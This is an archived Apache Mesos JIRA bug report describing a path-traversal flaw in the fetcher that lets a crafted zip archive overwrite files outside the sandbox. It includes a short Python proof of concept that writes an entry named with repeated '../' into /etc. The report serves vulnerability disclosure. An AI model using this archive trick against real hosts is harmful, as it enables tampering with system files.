You are viewing a plain text version of this content. The canonical link for it is here.

Posted to issues@mesos.apache.org by "Mariusz Derela (JIRA)" <ji...@apache.org> on 2019/02/26 02:06:00 UTC

[jira] [Created] (MESOS-9610) Fetcher vulnerability - escaping from sandbox

Mariusz Derela created MESOS-9610:
-------------------------------------

             Summary: Fetcher vulnerability - escaping from sandbox
                 Key: MESOS-9610
                 URL: https://issues.apache.org/jira/browse/MESOS-9610
             Project: Mesos
          Issue Type: Bug
          Components: fetcher
    Affects Versions: 1.7.2
            Reporter: Mariusz Derela


I have noticed that there is a possibility to exploit fetcher and  overwrite any files on the agent host.

scenario to reproduce:

1) prepare a file with any content and name a file like "../../../etc/test". we can use python and zipfile module to achieve that:
{code:java}
>>> import zipfile
>>> zip = zipfile.ZipFile("exploit.zip", "w")
>>> zip.writestr("../../../../../../../../../../../../etc/mariusz_was_here.txt", "some content")
>>> zip.close()

{code}
2) prepare a service that will use our artifact (exploit.zip)

3) run service

at the end in /etc we will get our file. As you can imagine there is a lot possibility how we can use it.

 

 



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)